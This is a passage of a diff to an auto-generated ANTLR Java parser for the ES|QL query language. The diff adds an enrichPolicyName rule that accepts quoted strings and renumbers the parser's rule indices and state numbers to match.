RULE_entryExpression = 74, RULE_constant = 75, RULE_booleanValue = 76, - RULE_numericValue = 77, RULE_decimalValue = 78, RULE_integerValue = 79, - RULE_string = 80, RULE_comparisonOperator = 81, 
RULE_joinCommand = 82, - RULE_joinTarget = 83, RULE_joinCondition = 84, RULE_joinPredicate = 85; + RULE_enrichPolicyName = 48, RULE_enrichWithClause = 49, RULE_sampleCommand = 50, + RULE_lookupCommand = 51, RULE_inlinestatsCommand = 52, RULE_changePointCommand = 53, + RULE_insistCommand = 54, RULE_forkCommand = 55, RULE_forkSubQueries = 56, + RULE_forkSubQuery = 57, RULE_forkSubQueryCommand = 58, RULE_forkSubQueryProcessingCommand = 59, + RULE_rrfCommand = 60, RULE_inferenceCommandOptions = 61, RULE_inferenceCommandOption = 62, + RULE_inferenceCommandOptionValue = 63, RULE_rerankCommand = 64, RULE_completionCommand = 65, + RULE_booleanExpression = 66, RULE_regexBooleanExpression = 67, RULE_matchBooleanExpression = 68, + RULE_valueExpression = 69, RULE_operatorExpression = 70, RULE_primaryExpression = 71, + RULE_functionExpression = 72, RULE_functionName = 73, RULE_mapExpression = 74, + RULE_entryExpression = 75, RULE_constant = 76, RULE_booleanValue = 77, + RULE_numericValue = 78, RULE_decimalValue = 79, RULE_integerValue = 80, + RULE_string = 81, RULE_comparisonOperator = 82, RULE_joinCommand = 83, + RULE_joinTarget = 84, RULE_joinCondition = 85, RULE_joinPredicate = 86; private static String[] makeRuleNames() { return new String[] { "singleStatement", "query", "sourceCommand", "processingCommand", "whereCommand", @@ -95,9 +95,9 @@ private static String[] makeRuleNames() { "limitCommand", "sortCommand", "orderExpression", "keepCommand", "dropCommand", "renameCommand", "renameClause", "dissectCommand", "grokCommand", "mvExpandCommand", "commandOptions", "commandOption", "explainCommand", "subqueryExpression", - "showCommand", "enrichCommand", "enrichWithClause", "sampleCommand", - "lookupCommand", "inlinestatsCommand", "changePointCommand", "insistCommand", - "forkCommand", "forkSubQueries", "forkSubQuery", "forkSubQueryCommand", + "showCommand", "enrichCommand", "enrichPolicyName", "enrichWithClause", + "sampleCommand", "lookupCommand", "inlinestatsCommand", "changePointCommand", + "insistCommand", "forkCommand", "forkSubQueries", "forkSubQuery", "forkSubQueryCommand", "forkSubQueryProcessingCommand", "rrfCommand", "inferenceCommandOptions", "inferenceCommandOption", "inferenceCommandOptionValue", "rerankCommand", "completionCommand", "booleanExpression", "regexBooleanExpression", "matchBooleanExpression", @@ -244,9 +244,9 @@ public final SingleStatementContext singleStatement() throws RecognitionExceptio try { enterOuterAlt(_localctx, 1); { - setState(172); + setState(174); query(0); - setState(173); + setState(175); match(EOF); } } @@ -342,11 +342,11 @@ private QueryContext query(int _p) throws RecognitionException { _ctx = _localctx; _prevctx = _localctx; - setState(176); + setState(178); sourceCommand(); } _ctx.stop = _input.LT(-1); - setState(183); + setState(185); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,0,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -357,16 +357,16 @@ private QueryContext query(int _p) throws RecognitionException { { _localctx = new CompositeQueryContext(new QueryContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_query); - setState(178); + setState(180); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(179); + setState(181); match(PIPE); - setState(180); + setState(182); processingCommand(); } } } - setState(185); + setState(187); _errHandler.sync(this); _alt = 
getInterpreter().adaptivePredict(_input,0,_ctx); } @@ -424,45 +424,45 @@ public final SourceCommandContext sourceCommand() throws RecognitionException { SourceCommandContext _localctx = new SourceCommandContext(_ctx, getState()); enterRule(_localctx, 4, RULE_sourceCommand); try { - setState(193); + setState(195); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,1,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(186); + setState(188); fromCommand(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(187); + setState(189); rowCommand(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(188); + setState(190); showCommand(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(189); + setState(191); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(190); + setState(192); timeSeriesCommand(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(191); + setState(193); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(192); + setState(194); explainCommand(); } break; @@ -571,170 +571,170 @@ public final ProcessingCommandContext processingCommand() throws RecognitionExce ProcessingCommandContext _localctx = new ProcessingCommandContext(_ctx, getState()); enterRule(_localctx, 6, RULE_processingCommand); try { - setState(222); + setState(224); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,2,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(195); + setState(197); evalCommand(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(196); + setState(198); whereCommand(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(197); + setState(199); keepCommand(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(198); + setState(200); limitCommand(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(199); + setState(201); statsCommand(); } break; case 6: enterOuterAlt(_localctx, 6); { - setState(200); + setState(202); sortCommand(); } break; case 7: enterOuterAlt(_localctx, 7); { - setState(201); + setState(203); dropCommand(); } break; case 8: enterOuterAlt(_localctx, 8); { - setState(202); + setState(204); renameCommand(); } break; case 9: enterOuterAlt(_localctx, 9); { - setState(203); + setState(205); dissectCommand(); } break; case 10: enterOuterAlt(_localctx, 10); { - setState(204); + setState(206); grokCommand(); } break; case 11: enterOuterAlt(_localctx, 11); { - setState(205); + setState(207); enrichCommand(); } break; case 12: enterOuterAlt(_localctx, 12); { - setState(206); + setState(208); mvExpandCommand(); } break; case 13: enterOuterAlt(_localctx, 13); { - setState(207); + setState(209); joinCommand(); } break; case 14: enterOuterAlt(_localctx, 14); { - setState(208); + setState(210); changePointCommand(); } break; case 15: enterOuterAlt(_localctx, 15); { - setState(209); + setState(211); completionCommand(); } break; case 16: enterOuterAlt(_localctx, 16); { - setState(210); + setState(212); sampleCommand(); } break; case 17: enterOuterAlt(_localctx, 17); { - setState(211); + setState(213); forkCommand(); } break; case 18: enterOuterAlt(_localctx, 18); { - setState(212); + setState(214); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(213); + setState(215); inlinestatsCommand(); } break; case 19: enterOuterAlt(_localctx, 19); { - setState(214); + setState(216); if (!(this.isDevVersion())) throw new 
FailedPredicateException(this, "this.isDevVersion()"); - setState(215); + setState(217); lookupCommand(); } break; case 20: enterOuterAlt(_localctx, 20); { - setState(216); + setState(218); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(217); + setState(219); insistCommand(); } break; case 21: enterOuterAlt(_localctx, 21); { - setState(218); + setState(220); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(219); + setState(221); rerankCommand(); } break; case 22: enterOuterAlt(_localctx, 22); { - setState(220); + setState(222); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(221); + setState(223); rrfCommand(); } break; @@ -783,9 +783,9 @@ public final WhereCommandContext whereCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(224); + setState(226); match(WHERE); - setState(225); + setState(227); booleanExpression(0); } } @@ -843,7 +843,7 @@ public final DataTypeContext dataType() throws RecognitionException { _localctx = new ToDataTypeContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(227); + setState(229); identifier(); } } @@ -890,9 +890,9 @@ public final RowCommandContext rowCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(229); + setState(231); match(ROW); - setState(230); + setState(232); fields(); } } @@ -946,23 +946,23 @@ public final FieldsContext fields() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(232); + setState(234); field(); - setState(237); + setState(239); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(233); + setState(235); match(COMMA); - setState(234); + setState(236); field(); } } } - setState(239); + setState(241); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); } @@ -1014,19 +1014,19 @@ public final FieldContext field() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(243); + setState(245); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,4,_ctx) ) { case 1: { - setState(240); + setState(242); qualifiedName(); - setState(241); + setState(243); match(ASSIGN); } break; } - setState(245); + setState(247); booleanExpression(0); } } @@ -1080,23 +1080,23 @@ public final RerankFieldsContext rerankFields() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(247); + setState(249); rerankField(); - setState(252); + setState(254); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,5,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(248); + setState(250); match(COMMA); - setState(249); + setState(251); rerankField(); } } } - setState(254); + setState(256); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,5,_ctx); } @@ -1148,16 +1148,16 @@ public final RerankFieldContext rerankField() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(255); + setState(257); qualifiedName(); - setState(258); + setState(260); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,6,_ctx) ) { case 1: { - setState(256); + setState(258); match(ASSIGN); - setState(257); + setState(259); booleanExpression(0); } 
break; @@ -1207,9 +1207,9 @@ public final FromCommandContext fromCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(260); + setState(262); match(FROM); - setState(261); + setState(263); indexPatternAndMetadataFields(); } } @@ -1256,9 +1256,9 @@ public final TimeSeriesCommandContext timeSeriesCommand() throws RecognitionExce try { enterOuterAlt(_localctx, 1); { - setState(263); + setState(265); match(DEV_TIME_SERIES); - setState(264); + setState(266); indexPatternAndMetadataFields(); } } @@ -1315,32 +1315,32 @@ public final IndexPatternAndMetadataFieldsContext indexPatternAndMetadataFields( int _alt; enterOuterAlt(_localctx, 1); { - setState(266); + setState(268); indexPattern(); - setState(271); + setState(273); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,7,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(267); + setState(269); match(COMMA); - setState(268); + setState(270); indexPattern(); } } } - setState(273); + setState(275); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,7,_ctx); } - setState(275); + setState(277); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,8,_ctx) ) { case 1: { - setState(274); + setState(276); metadata(); } break; @@ -1398,35 +1398,35 @@ public final IndexPatternContext indexPattern() throws RecognitionException { IndexPatternContext _localctx = new IndexPatternContext(_ctx, getState()); enterRule(_localctx, 28, RULE_indexPattern); try { - setState(286); + setState(288); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,9,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(277); + setState(279); clusterString(); - setState(278); + setState(280); match(COLON); - setState(279); + setState(281); unquotedIndexString(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(281); + setState(283); unquotedIndexString(); - setState(282); + setState(284); match(CAST_OP); - setState(283); + setState(285); selectorString(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(285); + setState(287); indexString(); } break; @@ -1472,7 +1472,7 @@ public final ClusterStringContext clusterString() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(288); + setState(290); match(UNQUOTED_SOURCE); } } @@ -1516,7 +1516,7 @@ public final SelectorStringContext selectorString() throws RecognitionException try { enterOuterAlt(_localctx, 1); { - setState(290); + setState(292); match(UNQUOTED_SOURCE); } } @@ -1560,7 +1560,7 @@ public final UnquotedIndexStringContext unquotedIndexString() throws Recognition try { enterOuterAlt(_localctx, 1); { - setState(292); + setState(294); match(UNQUOTED_SOURCE); } } @@ -1606,7 +1606,7 @@ public final IndexStringContext indexString() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(294); + setState(296); _la = _input.LA(1); if ( !(_la==QUOTED_STRING || _la==UNQUOTED_SOURCE) ) { _errHandler.recoverInline(this); @@ -1667,25 +1667,25 @@ public final MetadataContext metadata() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(296); + setState(298); match(METADATA); - setState(297); + setState(299); match(UNQUOTED_SOURCE); - setState(302); + setState(304); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,10,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(298); + 
setState(300); match(COMMA); - setState(299); + setState(301); match(UNQUOTED_SOURCE); } } } - setState(304); + setState(306); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,10,_ctx); } @@ -1734,9 +1734,9 @@ public final EvalCommandContext evalCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(305); + setState(307); match(EVAL); - setState(306); + setState(308); fields(); } } @@ -1789,26 +1789,26 @@ public final StatsCommandContext statsCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(308); - match(STATS); setState(310); + match(STATS); + setState(312); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,11,_ctx) ) { case 1: { - setState(309); + setState(311); ((StatsCommandContext)_localctx).stats = aggFields(); } break; } - setState(314); + setState(316); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,12,_ctx) ) { case 1: { - setState(312); + setState(314); match(BY); - setState(313); + setState(315); ((StatsCommandContext)_localctx).grouping = fields(); } break; @@ -1865,23 +1865,23 @@ public final AggFieldsContext aggFields() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(316); + setState(318); aggField(); - setState(321); + setState(323); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,13,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(317); + setState(319); match(COMMA); - setState(318); + setState(320); aggField(); } } } - setState(323); + setState(325); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,13,_ctx); } @@ -1933,16 +1933,16 @@ public final AggFieldContext aggField() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(324); + setState(326); field(); - setState(327); + setState(329); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,14,_ctx) ) { case 1: { - setState(325); + setState(327); match(WHERE); - setState(326); + setState(328); booleanExpression(0); } break; @@ -1999,23 +1999,23 @@ public final QualifiedNameContext qualifiedName() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(329); + setState(331); identifierOrParameter(); - setState(334); + setState(336); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,15,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(330); + setState(332); match(DOT); - setState(331); + setState(333); identifierOrParameter(); } } } - setState(336); + setState(338); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,15,_ctx); } @@ -2071,23 +2071,23 @@ public final QualifiedNamePatternContext qualifiedNamePattern() throws Recogniti int _alt; enterOuterAlt(_localctx, 1); { - setState(337); + setState(339); identifierPattern(); - setState(342); + setState(344); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,16,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(338); + setState(340); match(DOT); - setState(339); + setState(341); identifierPattern(); } } } - setState(344); + setState(346); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,16,_ctx); } @@ -2143,23 +2143,23 @@ public final QualifiedNamePatternsContext qualifiedNamePatterns() throws Recogni int _alt; 
enterOuterAlt(_localctx, 1); { - setState(345); + setState(347); qualifiedNamePattern(); - setState(350); + setState(352); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,17,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(346); + setState(348); match(COMMA); - setState(347); + setState(349); qualifiedNamePattern(); } } } - setState(352); + setState(354); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,17,_ctx); } @@ -2207,7 +2207,7 @@ public final IdentifierContext identifier() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(353); + setState(355); _la = _input.LA(1); if ( !(_la==UNQUOTED_IDENTIFIER || _la==QUOTED_IDENTIFIER) ) { _errHandler.recoverInline(this); @@ -2263,13 +2263,13 @@ public final IdentifierPatternContext identifierPattern() throws RecognitionExce IdentifierPatternContext _localctx = new IdentifierPatternContext(_ctx, getState()); enterRule(_localctx, 56, RULE_identifierPattern); try { - setState(358); + setState(360); _errHandler.sync(this); switch (_input.LA(1)) { case ID_PATTERN: enterOuterAlt(_localctx, 1); { - setState(355); + setState(357); match(ID_PATTERN); } break; @@ -2277,7 +2277,7 @@ public final IdentifierPatternContext identifierPattern() throws RecognitionExce case NAMED_OR_POSITIONAL_PARAM: enterOuterAlt(_localctx, 2); { - setState(356); + setState(358); parameter(); } break; @@ -2285,7 +2285,7 @@ public final IdentifierPatternContext identifierPattern() throws RecognitionExce case NAMED_OR_POSITIONAL_DOUBLE_PARAMS: enterOuterAlt(_localctx, 3); { - setState(357); + setState(359); doubleParameter(); } break; @@ -2361,14 +2361,14 @@ public final ParameterContext parameter() throws RecognitionException { ParameterContext _localctx = new ParameterContext(_ctx, getState()); enterRule(_localctx, 58, RULE_parameter); try { - setState(362); + setState(364); _errHandler.sync(this); switch (_input.LA(1)) { case PARAM: _localctx = new InputParamContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(360); + setState(362); match(PARAM); } break; @@ -2376,7 +2376,7 @@ public final ParameterContext parameter() throws RecognitionException { _localctx = new InputNamedOrPositionalParamContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(361); + setState(363); match(NAMED_OR_POSITIONAL_PARAM); } break; @@ -2452,14 +2452,14 @@ public final DoubleParameterContext doubleParameter() throws RecognitionExceptio DoubleParameterContext _localctx = new DoubleParameterContext(_ctx, getState()); enterRule(_localctx, 60, RULE_doubleParameter); try { - setState(366); + setState(368); _errHandler.sync(this); switch (_input.LA(1)) { case DOUBLE_PARAMS: _localctx = new InputDoubleParamsContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(364); + setState(366); match(DOUBLE_PARAMS); } break; @@ -2467,7 +2467,7 @@ public final DoubleParameterContext doubleParameter() throws RecognitionExceptio _localctx = new InputNamedOrPositionalDoubleParamsContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(365); + setState(367); match(NAMED_OR_POSITIONAL_DOUBLE_PARAMS); } break; @@ -2521,14 +2521,14 @@ public final IdentifierOrParameterContext identifierOrParameter() throws Recogni IdentifierOrParameterContext _localctx = new IdentifierOrParameterContext(_ctx, getState()); enterRule(_localctx, 62, RULE_identifierOrParameter); try { - setState(371); + setState(373); _errHandler.sync(this); switch (_input.LA(1)) { case 
UNQUOTED_IDENTIFIER: case QUOTED_IDENTIFIER: enterOuterAlt(_localctx, 1); { - setState(368); + setState(370); identifier(); } break; @@ -2536,7 +2536,7 @@ public final IdentifierOrParameterContext identifierOrParameter() throws Recogni case NAMED_OR_POSITIONAL_PARAM: enterOuterAlt(_localctx, 2); { - setState(369); + setState(371); parameter(); } break; @@ -2544,7 +2544,7 @@ public final IdentifierOrParameterContext identifierOrParameter() throws Recogni case NAMED_OR_POSITIONAL_DOUBLE_PARAMS: enterOuterAlt(_localctx, 3); { - setState(370); + setState(372); doubleParameter(); } break; @@ -2595,9 +2595,9 @@ public final LimitCommandContext limitCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(373); + setState(375); match(LIMIT); - setState(374); + setState(376); constant(); } } @@ -2652,25 +2652,25 @@ public final SortCommandContext sortCommand() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(376); + setState(378); match(SORT); - setState(377); + setState(379); orderExpression(); - setState(382); + setState(384); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,22,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(378); + setState(380); match(COMMA); - setState(379); + setState(381); orderExpression(); } } } - setState(384); + setState(386); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,22,_ctx); } @@ -2726,14 +2726,14 @@ public final OrderExpressionContext orderExpression() throws RecognitionExceptio try { enterOuterAlt(_localctx, 1); { - setState(385); - booleanExpression(0); setState(387); + booleanExpression(0); + setState(389); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,23,_ctx) ) { case 1: { - setState(386); + setState(388); ((OrderExpressionContext)_localctx).ordering = _input.LT(1); _la = _input.LA(1); if ( !(_la==ASC || _la==DESC) ) { @@ -2747,14 +2747,14 @@ public final OrderExpressionContext orderExpression() throws RecognitionExceptio } break; } - setState(391); + setState(393); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,24,_ctx) ) { case 1: { - setState(389); + setState(391); match(NULLS); - setState(390); + setState(392); ((OrderExpressionContext)_localctx).nullOrdering = _input.LT(1); _la = _input.LA(1); if ( !(_la==FIRST || _la==LAST) ) { @@ -2813,9 +2813,9 @@ public final KeepCommandContext keepCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(393); + setState(395); match(KEEP); - setState(394); + setState(396); qualifiedNamePatterns(); } } @@ -2862,9 +2862,9 @@ public final DropCommandContext dropCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(396); + setState(398); match(DROP); - setState(397); + setState(399); qualifiedNamePatterns(); } } @@ -2919,25 +2919,25 @@ public final RenameCommandContext renameCommand() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(399); + setState(401); match(RENAME); - setState(400); + setState(402); renameClause(); - setState(405); + setState(407); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,25,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(401); + setState(403); match(COMMA); - setState(402); + setState(404); renameClause(); } } } - setState(407); + setState(409); _errHandler.sync(this); _alt = 
getInterpreter().adaptivePredict(_input,25,_ctx); } @@ -2990,28 +2990,28 @@ public final RenameClauseContext renameClause() throws RecognitionException { RenameClauseContext _localctx = new RenameClauseContext(_ctx, getState()); enterRule(_localctx, 76, RULE_renameClause); try { - setState(416); + setState(418); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,26,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(408); + setState(410); ((RenameClauseContext)_localctx).oldName = qualifiedNamePattern(); - setState(409); + setState(411); match(AS); - setState(410); + setState(412); ((RenameClauseContext)_localctx).newName = qualifiedNamePattern(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(412); + setState(414); ((RenameClauseContext)_localctx).newName = qualifiedNamePattern(); - setState(413); + setState(415); match(ASSIGN); - setState(414); + setState(416); ((RenameClauseContext)_localctx).oldName = qualifiedNamePattern(); } break; @@ -3066,18 +3066,18 @@ public final DissectCommandContext dissectCommand() throws RecognitionException try { enterOuterAlt(_localctx, 1); { - setState(418); + setState(420); match(DISSECT); - setState(419); + setState(421); primaryExpression(0); - setState(420); - string(); setState(422); + string(); + setState(424); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,27,_ctx) ) { case 1: { - setState(421); + setState(423); commandOptions(); } break; @@ -3130,11 +3130,11 @@ public final GrokCommandContext grokCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(424); + setState(426); match(GROK); - setState(425); + setState(427); primaryExpression(0); - setState(426); + setState(428); string(); } } @@ -3181,9 +3181,9 @@ public final MvExpandCommandContext mvExpandCommand() throws RecognitionExceptio try { enterOuterAlt(_localctx, 1); { - setState(428); + setState(430); match(MV_EXPAND); - setState(429); + setState(431); qualifiedName(); } } @@ -3237,23 +3237,23 @@ public final CommandOptionsContext commandOptions() throws RecognitionException int _alt; enterOuterAlt(_localctx, 1); { - setState(431); + setState(433); commandOption(); - setState(436); + setState(438); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,28,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(432); + setState(434); match(COMMA); - setState(433); + setState(435); commandOption(); } } } - setState(438); + setState(440); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,28,_ctx); } @@ -3305,11 +3305,11 @@ public final CommandOptionContext commandOption() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(439); + setState(441); identifier(); - setState(440); + setState(442); match(ASSIGN); - setState(441); + setState(443); constant(); } } @@ -3356,9 +3356,9 @@ public final ExplainCommandContext explainCommand() throws RecognitionException try { enterOuterAlt(_localctx, 1); { - setState(443); + setState(445); match(DEV_EXPLAIN); - setState(444); + setState(446); subqueryExpression(); } } @@ -3406,11 +3406,11 @@ public final SubqueryExpressionContext subqueryExpression() throws RecognitionEx try { enterOuterAlt(_localctx, 1); { - setState(446); + setState(448); match(LP); - setState(447); + setState(449); query(0); - setState(448); + setState(450); match(RP); } } @@ -3467,9 +3467,9 @@ public final ShowCommandContext showCommand() throws RecognitionException 
{ _localctx = new ShowInfoContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(450); + setState(452); match(SHOW); - setState(451); + setState(453); match(INFO); } } @@ -3486,10 +3486,12 @@ public final ShowCommandContext showCommand() throws RecognitionException { @SuppressWarnings("CheckReturnValue") public static class EnrichCommandContext extends ParserRuleContext { - public Token policyName; + public EnrichPolicyNameContext policyName; public QualifiedNamePatternContext matchField; public TerminalNode ENRICH() { return getToken(EsqlBaseParser.ENRICH, 0); } - public TerminalNode ENRICH_POLICY_NAME() { return getToken(EsqlBaseParser.ENRICH_POLICY_NAME, 0); } + public EnrichPolicyNameContext enrichPolicyName() { + return getRuleContext(EnrichPolicyNameContext.class,0); + } public TerminalNode ON() { return getToken(EsqlBaseParser.ON, 0); } public TerminalNode WITH() { return getToken(EsqlBaseParser.WITH, 0); } public List<EnrichWithClauseContext> enrichWithClause() { @@ -3532,46 +3534,46 @@ public final EnrichCommandContext enrichCommand() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(453); + setState(455); match(ENRICH); - setState(454); - ((EnrichCommandContext)_localctx).policyName = match(ENRICH_POLICY_NAME); - setState(457); + setState(456); + ((EnrichCommandContext)_localctx).policyName = enrichPolicyName(); + setState(459); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,29,_ctx) ) { case 1: { - setState(455); + setState(457); match(ON); - setState(456); + setState(458); ((EnrichCommandContext)_localctx).matchField = qualifiedNamePattern(); } break; } - setState(468); + setState(470); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,31,_ctx) ) { case 1: { - setState(459); + setState(461); match(WITH); - setState(460); + setState(462); enrichWithClause(); - setState(465); + setState(467); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,30,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(461); + setState(463); match(COMMA); - setState(462); + setState(464); enrichWithClause(); } } } - setState(467); + setState(469); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,30,_ctx); } @@ -3591,6 +3593,60 @@ public final EnrichCommandContext enrichCommand() throws RecognitionException { return _localctx; } + @SuppressWarnings("CheckReturnValue") + public static class EnrichPolicyNameContext extends ParserRuleContext { + public TerminalNode ENRICH_POLICY_NAME() { return getToken(EsqlBaseParser.ENRICH_POLICY_NAME, 0); } + public TerminalNode QUOTED_STRING() { return getToken(EsqlBaseParser.QUOTED_STRING, 0); } + @SuppressWarnings("this-escape") + public EnrichPolicyNameContext(ParserRuleContext parent, int invokingState) { + super(parent, invokingState); + } + @Override public int getRuleIndex() { return RULE_enrichPolicyName; } + @Override + public void enterRule(ParseTreeListener listener) { + if ( listener instanceof EsqlBaseParserListener ) ((EsqlBaseParserListener)listener).enterEnrichPolicyName(this); + } + @Override + public void exitRule(ParseTreeListener listener) { + if ( listener instanceof EsqlBaseParserListener ) ((EsqlBaseParserListener)listener).exitEnrichPolicyName(this); + } + @Override + public <T> T accept(ParseTreeVisitor<? extends T> visitor) { + if ( visitor instanceof EsqlBaseParserVisitor ) return ((EsqlBaseParserVisitor<? extends T>)visitor).visitEnrichPolicyName(this); + else return visitor.visitChildren(this); + } + }
